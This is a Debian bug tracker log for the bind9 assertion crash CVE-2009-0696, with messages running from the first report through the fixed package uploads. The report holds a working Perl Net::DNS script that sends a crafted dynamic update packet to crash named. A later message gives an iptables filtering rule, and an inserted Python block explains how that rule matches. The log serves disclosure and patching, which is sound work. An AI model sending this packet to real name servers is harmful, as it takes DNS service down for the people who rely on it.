Debian Bug report logs - #538975
bind9 dies with assertion failure (db.c:579)


Package: bind9; Maintainer for bind9 is LaMont Jones <lamont@debian.org>; Source for bind9 is src:bind9.

Reported by: Micha Krause <debianbugs@noris.net>

Date: Tue, 28 Jul 2009 09:30:02 UTC

Severity: serious

Tags: security

Fixed in versions bind9/1:9.6.1.dfsg.P1-1, bind9/1:9.5.1.dfsg.P3-1

Done: LaMont Jones <lamont@debian.org>

Bug is archived. No further changes may be made.



Report forwarded to debian-bugs-dist@lists.debian.org, LaMont Jones <lamont@debian.org>:
Bug#538975; Package bind9. (Tue, 28 Jul 2009 09:30:05 GMT) Full text and rfc822 format available.

Acknowledgement sent to Micha Krause <debianbugs@noris.net>:
New Bug report received and forwarded. Copy sent to LaMont Jones <lamont@debian.org>. (Tue, 28 Jul 2009 09:30:05 GMT) Full text and rfc822 format available.

Message #5 received at submit@bugs.debian.org (full text, mbox):

From: Micha Krause <debianbugs@noris.net>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: bind9 dies with assertion failure (db.c:579)
Date: Tue, 28 Jul 2009 11:29:17 +0200
Package: bind9
Severity: normal


bind can be crashed with an update packet:

Packet in tcpdump:

15:38:11.676045 IP (tos 0x0, ttl  64, id 0, offset 0, flags [DF], proto: UDP (17), length: 178) 10.2.0.205.59447 > 10.2.0.205.53:  17378 update [1a] [1n] [1au] SOA? 8.0.10.in-addr.arpa. 8.8.0.10.in-addr.arpa. ANY ns: [|domain]

Another view of the Packet:

| ;; HEADER SECTION
| ;; id = 181
| ;; qr = 0    opcode = UPDATE    rcode = NOERROR
| ;; zocount = 1  prcount = 1  upcount = 1  adcount = 1
|
| ;; ZONE SECTION (1 record)
| ;; 8.0.10.in-addr.arpa.       IN      SOA
|
| ;; PREREQUISITE SECTION (1 record)
| 4.8.0.10.in-addr.arpa.        0       IN      ANY     ; no data
|
| ;; UPDATE SECTION (1 record)
| 4.8.0.10.in-addr.arpa.        0       ANY     ANY     ; no data
|
| ;; ADDITIONAL SECTION (1 record)
| office.example.com.        0       ANY     TSIG    HMAC-MD5.SIG-ALG.REG.INT. NOERROR


Such a packet can be created with perl:

-----------------

#!/usr/bin/perl -w

use Net::DNS;

our $NSI = '<dns server>';
our $NSI_KEY_NAME = '<key name>';
our $NSI_KEY = '<key>';


my $rzone = '<zone>';
my $rptr  = "1.$rzone";

my $packet = Net::DNS::Update->new($rzone);

$packet->push(
    pre => Net::DNS::RR->new(
        Name  => $rptr,
        Class => 'IN',
        Type  => 'ANY',
        TTL   => 0,
    )
);
$packet->push(
    update => Net::DNS::RR->new(
        Name  => $rptr,
        Class => 'ANY',
        Type  => 'ANY',
    )
);

$packet->sign_tsig( $NSI_KEY_NAME, $NSI_KEY ) if $NSI_KEY_NAME && $NSI_KEY;


print $packet->string;

Net::DNS::Resolver->new( nameservers => [$NSI] )->send($packet);

--------------------


bind only crashes if the FQDN used exists on the nameserver.


-- System Information:
Debian Release: 5.0.2
  APT prefers proposed-updates
  APT policy: (500, 'proposed-updates'), (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-1-xen-686 (SMP w/1 CPU core)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash




Added tag(s) security. Request was from Matthias Urlichs <smurf@smurf.noris.de> to control@bugs.debian.org. (Tue, 28 Jul 2009 12:33:13 GMT) Full text and rfc822 format available.

Severity set to 'serious' from 'normal' Request was from Matthias Urlichs <smurf@smurf.noris.de> to control@bugs.debian.org. (Tue, 28 Jul 2009 12:33:14 GMT) Full text and rfc822 format available.

Information forwarded to debian-bugs-dist@lists.debian.org, LaMont Jones <lamont@debian.org>:
Bug#538975; Package bind9. (Tue, 28 Jul 2009 20:12:06 GMT) Full text and rfc822 format available.

Acknowledgement sent to Thijs Kinkhorst <thijs@debian.org>:
Extra info received and forwarded to list. Copy sent to LaMont Jones <lamont@debian.org>. (Tue, 28 Jul 2009 20:12:07 GMT) Full text and rfc822 format available.

Message #14 received at 538975@bugs.debian.org (full text, mbox):

From: Thijs Kinkhorst <thijs@debian.org>
To: 538975@bugs.debian.org
Subject: CVE name assigned
Date: Tue, 28 Jul 2009 22:05:44 +0200
This is CVE-2009-0696 and CERT VU#725188.
Please reference them in any relevant changelogs.

Information forwarded to debian-bugs-dist@lists.debian.org, LaMont Jones <lamont@debian.org>:
Bug#538975; Package bind9. (Wed, 29 Jul 2009 00:36:02 GMT) Full text and rfc822 format available.

Acknowledgement sent to Michael Holzt <debian-bugreports@michael.holzt.de>:
Extra info received and forwarded to list. Copy sent to LaMont Jones <lamont@debian.org>. (Wed, 29 Jul 2009 00:36:02 GMT) Full text and rfc822 format available.

Message #19 received at 538975@bugs.debian.org (full text, mbox):

From: Michael Holzt <debian-bugreports@michael.holzt.de>
To: 538975@bugs.debian.org
Subject: Quick fix with iptables
Date: Wed, 29 Jul 2009 02:31:48 +0200
As a hint for other sysadmins:

For the time until a fixed Debian package is available, this iptables rule
should filter all dnsupdate packets, thus mitigating the attack:

| iptables -A INPUT -p udp --dport 53 -j DROP -m u32 --u32 '30>>27&0xF=5'

Works for me, but no guarantee. I have added a second rule which logs
said dnsupdate packets and I already got several such packets from the
outside world, so the exploit is clearly in active use and the least you
can do is to try the iptables rule.


Regards
Michael

-- 
It's an insane world, but i'm proud to be a part of it. -- Bill Hicks
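
What the u32 expression in the rule above tests, as an added example that is not part of the original message: it reads 32 bits at byte 30 from the start of the IP header and compares the 4-bit DNS opcode to 5 (UPDATE), which is only the DNS flags field when the IPv4 header has no options. The packets below are constructed samples, and all function names are hypothetical.

```python
import struct

DNS_OPCODE_UPDATE = 5  # opcode value for UPDATE (RFC 2136)


def build_packet(opcode, ip_options=b"", qr=0):
    """Constructed IPv4/UDP packet to port 53 holding only a 12-byte DNS header."""
    if len(ip_options) % 4:
        raise ValueError("IP options must be padded to a multiple of 4 bytes")
    ihl = 5 + len(ip_options) // 4          # header length in 32-bit words
    dns = struct.pack("!HHHHHH", 0x1234, (qr << 15) | (opcode << 11), 1, 0, 0, 0)
    udp = struct.pack("!HHHH", 40000, 53, 8 + len(dns), 0)
    ip = struct.pack("!BBHHHBBH4s4s", (4 << 4) | ihl, 0,
                     ihl * 4 + len(udp) + len(dns), 0, 0x4000, 64, 17, 0,
                     bytes([192, 0, 2, 1]), bytes([192, 0, 2, 53]))
    return ip + ip_options + udp + dns


def u32_fixed_offset_match(packet):
    """Emulate --u32 '30>>27&0xF=5': offset 30 = 20 (IP) + 8 (UDP) + 2 (DNS id)."""
    if len(packet) < 34:
        return False                         # the 4 bytes at offset 30 must exist
    (word,) = struct.unpack_from("!I", packet, 30)
    # Top 5 bits of the word are QR + opcode; the mask keeps the 4 opcode bits.
    return ((word >> 27) & 0xF) == DNS_OPCODE_UPDATE


def ihl_aware_match(packet):
    """Same opcode test, but locating the DNS flags from the real IP header length."""
    if len(packet) < 20:
        return False
    ip_header_len = (packet[0] & 0x0F) * 4
    flags_offset = ip_header_len + 8 + 2     # skip UDP header and the DNS id
    if ip_header_len < 20 or len(packet) < flags_offset + 2:
        return False
    (flags,) = struct.unpack_from("!H", packet, flags_offset)
    return ((flags >> 11) & 0xF) == DNS_OPCODE_UPDATE


def compare(packet):
    """Return (fixed-offset result, header-length-aware result) for one packet."""
    return u32_fixed_offset_match(packet), ihl_aware_match(packet)


if __name__ == "__main__":
    samples = {
        "query, no IP options": build_packet(0),
        "update, no IP options": build_packet(DNS_OPCODE_UPDATE),
        "update, 4 bytes of IP options": build_packet(DNS_OPCODE_UPDATE, b"\x01" * 4),
    }
    for label, pkt in samples.items():
        fixed, aware = compare(pkt)
        print(f"{label:32s} fixed-offset={fixed!s:5s} ihl-aware={aware}")
```

In u32 syntax the header-length-relative form uses the `0>>22&0x3C@` prefix described in the iptables-extensions man page, i.e. `0>>22&0x3C@10>>27&0xF=5`.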




Reply sent to LaMont Jones <lamont@debian.org>:
You have taken responsibility. (Wed, 29 Jul 2009 05:15:08 GMT) Full text and rfc822 format available.

Notification sent to Micha Krause <debianbugs@noris.net>:
Bug acknowledged by developer. (Wed, 29 Jul 2009 05:15:08 GMT) Full text and rfc822 format available.

Message #24 received at 538975-close@bugs.debian.org (full text, mbox):

From: LaMont Jones <lamont@debian.org>
To: 538975-close@bugs.debian.org
Subject: Bug#538975: fixed in bind9 1:9.6.1.dfsg.P1-1
Date: Wed, 29 Jul 2009 04:47:11 +0000
Source: bind9
Source-Version: 1:9.6.1.dfsg.P1-1

We believe that the bug you reported is fixed in the latest version of
bind9, which is due to be installed in the Debian FTP archive:

bind9-doc_9.6.1.dfsg.P1-1_all.deb
  to pool/main/b/bind9/bind9-doc_9.6.1.dfsg.P1-1_all.deb
bind9-host_9.6.1.dfsg.P1-1_amd64.deb
  to pool/main/b/bind9/bind9-host_9.6.1.dfsg.P1-1_amd64.deb
bind9_9.6.1.dfsg.P1-1.diff.gz
  to pool/main/b/bind9/bind9_9.6.1.dfsg.P1-1.diff.gz
bind9_9.6.1.dfsg.P1-1.dsc
  to pool/main/b/bind9/bind9_9.6.1.dfsg.P1-1.dsc
bind9_9.6.1.dfsg.P1-1_amd64.deb
  to pool/main/b/bind9/bind9_9.6.1.dfsg.P1-1_amd64.deb
bind9_9.6.1.dfsg.P1.orig.tar.gz
  to pool/main/b/bind9/bind9_9.6.1.dfsg.P1.orig.tar.gz
bind9utils_9.6.1.dfsg.P1-1_amd64.deb
  to pool/main/b/bind9/bind9utils_9.6.1.dfsg.P1-1_amd64.deb
dnsutils_9.6.1.dfsg.P1-1_amd64.deb
  to pool/main/b/bind9/dnsutils_9.6.1.dfsg.P1-1_amd64.deb
libbind-dev_9.6.1.dfsg.P1-1_amd64.deb
  to pool/main/b/bind9/libbind-dev_9.6.1.dfsg.P1-1_amd64.deb
libbind9-50_9.6.1.dfsg.P1-1_amd64.deb
  to pool/main/b/bind9/libbind9-50_9.6.1.dfsg.P1-1_amd64.deb
libdns50_9.6.1.dfsg.P1-1_amd64.deb
  to pool/main/b/bind9/libdns50_9.6.1.dfsg.P1-1_amd64.deb
libisc50_9.6.1.dfsg.P1-1_amd64.deb
  to pool/main/b/bind9/libisc50_9.6.1.dfsg.P1-1_amd64.deb
libisccc50_9.6.1.dfsg.P1-1_amd64.deb
  to pool/main/b/bind9/libisccc50_9.6.1.dfsg.P1-1_amd64.deb
libisccfg50_9.6.1.dfsg.P1-1_amd64.deb
  to pool/main/b/bind9/libisccfg50_9.6.1.dfsg.P1-1_amd64.deb
liblwres50_9.6.1.dfsg.P1-1_amd64.deb
  to pool/main/b/bind9/liblwres50_9.6.1.dfsg.P1-1_amd64.deb
lwresd_9.6.1.dfsg.P1-1_amd64.deb
  to pool/main/b/bind9/lwresd_9.6.1.dfsg.P1-1_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 538975@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
LaMont Jones <lamont@debian.org> (supplier of updated bind9 package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Tue, 28 Jul 2009 22:03:14 -0600
Source: bind9
Binary: bind9 bind9utils bind9-doc bind9-host libbind-dev libbind9-50 libdns50 libisc50 liblwres50 libisccc50 libisccfg50 dnsutils lwresd
Architecture: all amd64 source 
Version: 1:9.6.1.dfsg.P1-1
Distribution: unstable
Urgency: low
Maintainer: LaMont Jones <lamont@debian.org>
Changed-By: LaMont Jones <lamont@debian.org>
Description: 
 bind9      - Internet Domain Name Server
 bind9-doc  - Documentation for BIND
 bind9-host - Version of 'host' bundled with BIND 9.X
 bind9utils - Utilities for BIND
 dnsutils   - Clients provided with BIND
 libbind-dev - Static Libraries and Headers used by BIND
 libbind9-50 - BIND9 Shared Library used by BIND
 libdns50   - DNS Shared Library used by BIND
 libisc50   - ISC Shared Library used by BIND
 libisccc50 - Command Channel Library used by BIND
 libisccfg50 - Config File Handling Library used by BIND
 liblwres50 - Lightweight Resolver Library used by BIND
 lwresd     - Lightweight Resolver Daemon
Closes: 492308 527137 536487 538975
Changes: 
 bind9 (1:9.6.1.dfsg.P1-1) unstable; urgency=low
 .
   [Internet Software Consortium, Inc]
 .
   * A specially crafted update packet will cause named to exit.
     CVE-2009-0696, CERT VU#725188.  Closes: #538975
 .
   [InterNIC]
 .
   * Update db.root hints file.
 .
   [LaMont Jones]
 .
   * Move default zone definitions from named.conf to named.conf.default-zones.
      Closes: #492308
   * use start-stop-daemon if rndc stop fails.  Closes: #536487
   * lwresd: pidfile name was wrong in init script.  Closes: #527137
Files: 

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFKb84lzN/kmwoKyScRAtLgAJ9oeGH3WEVMgiSlrNISFHK2SUeuaQCeKs/g
fueONBapV0I1fCnLD0AEe0w=
=7Pf7
-----END PGP SIGNATURE-----





Added tag(s) pending. Request was from LaMont Jones <lamont@debian.org> to control@bugs.debian.org. (Wed, 29 Jul 2009 05:36:02 GMT) Full text and rfc822 format available.

Information forwarded to debian-bugs-dist@lists.debian.org, LaMont Jones <lamont@debian.org>:
Bug#538975; Package bind9. (Wed, 29 Jul 2009 19:03:02 GMT) Full text and rfc822 format available.

Acknowledgement sent to Yuriy Kolesnikov <yurikoles@gmail.com>:
Extra info received and forwarded to list. Copy sent to LaMont Jones <lamont@debian.org>. (Wed, 29 Jul 2009 19:03:02 GMT) Full text and rfc822 format available.

Message #31 received at 538975@bugs.debian.org (full text, mbox):

From: Yuriy Kolesnikov <yurikoles@gmail.com>
To: 538975@bugs.debian.org
Subject: Testing
Date: Wed, 29 Jul 2009 21:59:14 +0300
How to install update in testing? I uncommented
deb http://security.debian.org/debian/ stable/updates main contrib non-free
But there is no update!

Information forwarded to debian-bugs-dist@lists.debian.org, LaMont Jones <lamont@debian.org>:
Bug#538975; Package bind9. (Wed, 29 Jul 2009 19:27:09 GMT) Full text and rfc822 format available.

Acknowledgement sent to Ondřej Surý <ondrej@sury.org>:
Extra info received and forwarded to list. Copy sent to LaMont Jones <lamont@debian.org>. (Wed, 29 Jul 2009 19:27:09 GMT) Full text and rfc822 format available.

Message #36 received at 538975@bugs.debian.org (full text, mbox):

From: Ondřej Surý <ondrej@sury.org>
To: Yuriy Kolesnikov <yurikoles@gmail.com>, 538975@bugs.debian.org
Subject: Re: Bug#538975: Testing
Date: Wed, 29 Jul 2009 19:24:34 +0000
If you use testing, for sure, you know about:

http://lists.debian.org/debian-testing-security-announce/2008/12/msg00019.html

Ondrej

On Wed, Jul 29, 2009 at 18:59, Yuriy Kolesnikov<yurikoles@gmail.com> wrote:
> How to install update in testing? I uncommented
> deb http://security.debian.org/debian/ stable/updates main contrib non-free
> But there is no update!



-- 
Ondřej Surý <ondrej@sury.org>
http://blog.rfc1925.org/




Reply sent to LaMont Jones <lamont@debian.org>:
You have taken responsibility. (Sun, 02 Aug 2009 20:45:07 GMT) Full text and rfc822 format available.

Notification sent to Micha Krause <debianbugs@noris.net>:
Bug acknowledged by developer. (Sun, 02 Aug 2009 20:45:08 GMT) Full text and rfc822 format available.

Message #41 received at 538975-close@bugs.debian.org (full text, mbox):

From: LaMont Jones <lamont@debian.org>
To: 538975-close@bugs.debian.org
Subject: Bug#538975: fixed in bind9 1:9.5.1.dfsg.P3-1
Date: Sun, 02 Aug 2009 20:28:31 +0000
Source: bind9
Source-Version: 1:9.5.1.dfsg.P3-1

We believe that the bug you reported is fixed in the latest version of
bind9, which is due to be installed in the Debian FTP archive:

bind9-doc_9.5.1.dfsg.P3-1_all.deb
  to pool/main/b/bind9/bind9-doc_9.5.1.dfsg.P3-1_all.deb
bind9-host_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/bind9-host_9.5.1.dfsg.P3-1_amd64.deb
bind9_9.5.1.dfsg.P3-1.diff.gz
  to pool/main/b/bind9/bind9_9.5.1.dfsg.P3-1.diff.gz
bind9_9.5.1.dfsg.P3-1.dsc
  to pool/main/b/bind9/bind9_9.5.1.dfsg.P3-1.dsc
bind9_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/bind9_9.5.1.dfsg.P3-1_amd64.deb
bind9_9.5.1.dfsg.P3.orig.tar.gz
  to pool/main/b/bind9/bind9_9.5.1.dfsg.P3.orig.tar.gz
bind9utils_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/bind9utils_9.5.1.dfsg.P3-1_amd64.deb
dnsutils_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/dnsutils_9.5.1.dfsg.P3-1_amd64.deb
libbind-dev_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/libbind-dev_9.5.1.dfsg.P3-1_amd64.deb
libbind9-40_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/libbind9-40_9.5.1.dfsg.P3-1_amd64.deb
libdns45_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/libdns45_9.5.1.dfsg.P3-1_amd64.deb
libisc45_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/libisc45_9.5.1.dfsg.P3-1_amd64.deb
libisccc40_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/libisccc40_9.5.1.dfsg.P3-1_amd64.deb
libisccfg40_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/libisccfg40_9.5.1.dfsg.P3-1_amd64.deb
liblwres40_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/liblwres40_9.5.1.dfsg.P3-1_amd64.deb
lwresd_9.5.1.dfsg.P3-1_amd64.deb
  to pool/main/b/bind9/lwresd_9.5.1.dfsg.P3-1_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 538975@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
LaMont Jones <lamont@debian.org> (supplier of updated bind9 package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Tue, 28 Jul 2009 22:48:28 -0600
Source: bind9
Binary: bind9 bind9utils bind9-doc bind9-host libbind-dev libbind9-40 libdns45 libisc45 liblwres40 libisccc40 libisccfg40 dnsutils lwresd
Architecture: all amd64 source 
Version: 1:9.5.1.dfsg.P3-1
Distribution: stable-security
Urgency: low
Maintainer: LaMont Jones <lamont@debian.org>
Changed-By: LaMont Jones <lamont@debian.org>
Description: 
 bind9      - Internet Domain Name Server
 bind9-doc  - Documentation for BIND
 bind9-host - Version of 'host' bundled with BIND 9.X
 bind9utils - Utilities for BIND
 dnsutils   - Clients provided with BIND
 libbind-dev - Static Libraries and Headers used by BIND
 libbind9-40 - BIND9 Shared Library used by BIND
 libdns45   - DNS Shared Library used by BIND
 libisc45   - ISC Shared Library used by BIND
 libisccc40 - Command Channel Library used by BIND
 libisccfg40 - Config File Handling Library used by BIND
 liblwres40 - Lightweight Resolver Library used by BIND
 lwresd     - Lightweight Resolver Daemon
Closes: 538975
Changes: 
 bind9 (1:9.5.1.dfsg.P3-1) stable-security; urgency=low
 .
   [Internet Software Consortium, Inc]
 .
   * A specially crafted update packet will cause named to exit.
     CVE-2009-0696, CERT VU#725188.  Closes: #538975
Files: 

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFKb+DbzN/kmwoKyScRAtLaAJ4tTc8UsPadqLdtMwcWFuKJa4T2dQCfQ9OX
0gCyOrrhUy9K5OoHTAqIScM=
=9vlB
-----END PGP SIGNATURE-----





Reply sent to LaMont Jones <lamont@debian.org>:
You have taken responsibility. (Fri, 04 Sep 2009 19:15:35 GMT) Full text and rfc822 format available.

Notification sent to Micha Krause <debianbugs@noris.net>:
Bug acknowledged by developer. (Fri, 04 Sep 2009 19:15:35 GMT) Full text and rfc822 format available.

Message #46 received at 538975-close@bugs.debian.org (full text, mbox):

From: LaMont Jones <lamont@debian.org>
To: 538975-close@bugs.debian.org
Subject: Bug#538975: fixed in bind9 1:9.5.1.dfsg.P3-1
Date: Fri, 04 Sep 2009 18:31:44 +0000
Source: bind9
Source-Version: 1:9.5.1.dfsg.P3-1






Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sat, 03 Oct 2009 07:44:55 GMT) Full text and rfc822 format available.



Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Apr 16 08:37:01 2014; Machine Name: beach.debian.org
